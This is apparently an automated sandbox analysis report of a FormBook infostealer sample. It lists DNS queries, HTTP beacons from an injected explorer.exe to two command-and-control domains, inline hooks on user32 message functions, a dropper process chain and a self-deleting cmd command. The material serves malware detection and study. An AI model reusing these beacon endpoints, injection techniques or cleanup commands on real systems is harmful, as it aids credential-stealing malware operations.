                    May 27, 2022 18:36:54.414109945 CEST8.8.8.8192.168.2.30x62efNo error (0)www.dawonderer.comdawonderer.comCNAME (Canonical name)IN (0x0001)
                    May 27, 2022 18:36:54.414109945 CEST8.8.8.8192.168.2.30x62efNo error (0)dawonderer.com66.235.200.147A (IP address)IN (0x0001)
                    May 27, 2022 18:37:16.679555893 CEST8.8.8.8192.168.2.30x79c2No error (0)www.bolacorner.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)
                    May 27, 2022 18:37:16.679555893 CEST8.8.8.8192.168.2.30x79c2No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                    May 27, 2022 18:37:16.679555893 CEST8.8.8.8192.168.2.30x79c2No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)
                    May 27, 2022 18:37:16.679555893 CEST8.8.8.8192.168.2.30x79c2No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.dawonderer.com
                    • www.bolacorner.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.34975566.235.200.14780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    May 27, 2022 18:36:55.446707010 CEST1233OUTGET /sn31/?m6R01xM0=qZl/JLX84vnD5ytzVzk0/a0Hcpketn5qZPO1CaBkWF6tW2qs6ow5h/A/zRQwl5G72f7o&nPqD=gvLpMpxpWl HTTP/1.1
                    Host: www.dawonderer.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.34976252.71.57.18480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    May 27, 2022 18:37:16.821484089 CEST9605OUTGET /sn31/?m6R01xM0=f82GdrL9BOGPadRnOYEWsPSt+bOR3tUYa+dCVqOhmg/09rEzcw7t3bM5PuUufbFtM3zx&nPqD=gvLpMpxpWl HTTP/1.1
                    Host: www.bolacorner.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    May 27, 2022 18:37:16.958137035 CEST9605INHTTP/1.1 302 Found
                    content-length: 0
                    date: Fri, 27 May 2022 16:37:15 GMT
                    location: https://www.hugedomains.com/domain_profile.cfm?d=bolacorner.com
                    connection: close


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function NameHook TypeActive in Processes
                    PeekMessageAINLINEexplorer.exe
                    PeekMessageWINLINEexplorer.exe
                    GetMessageWINLINEexplorer.exe
                    GetMessageAINLINEexplorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function NameHook TypeNew Data
                    PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1
                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                    GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                    GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:18:35:17
                    Start date:27/05/2022
                    Path:C:\Users\user\Desktop\skyrunyyu655432.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\skyrunyyu655432.exe"
                    Imagebase:0x400000
                    File size:278102 bytes
                    MD5 hash:070A940CCBC84F85A8BA749ECCF55618
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Target ID:2
                    Start time:18:35:19
                    Start date:27/05/2022
                    Path:C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
                    Imagebase:0x1e0000
                    File size:134144 bytes
                    MD5 hash:E85BB68B7CBEFADF0D1ACD4B7B8BD528
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Antivirus matches:
                    • Detection: 37%, ReversingLabs
                    Reputation:low

                    General

                    Target ID:3
                    Start time:18:35:20
                    Start date:27/05/2022
                    Path:C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
                    Imagebase:0x1e0000
                    File size:134144 bytes
                    MD5 hash:E85BB68B7CBEFADF0D1ACD4B7B8BD528
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Target ID:6
                    Start time:18:35:27
                    Start date:27/05/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff6b8cf0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Target ID:13
                    Start time:18:35:59
                    Start date:27/05/2022
                    Path:C:\Windows\SysWOW64\ipconfig.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                    Imagebase:0x160000
                    File size:29184 bytes
                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:moderate

                    General

                    Target ID:14
                    Start time:18:36:05
                    Start date:27/05/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
                    Imagebase:0xc20000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:15
                    Start time:18:36:06
                    Start date:27/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    No disassembly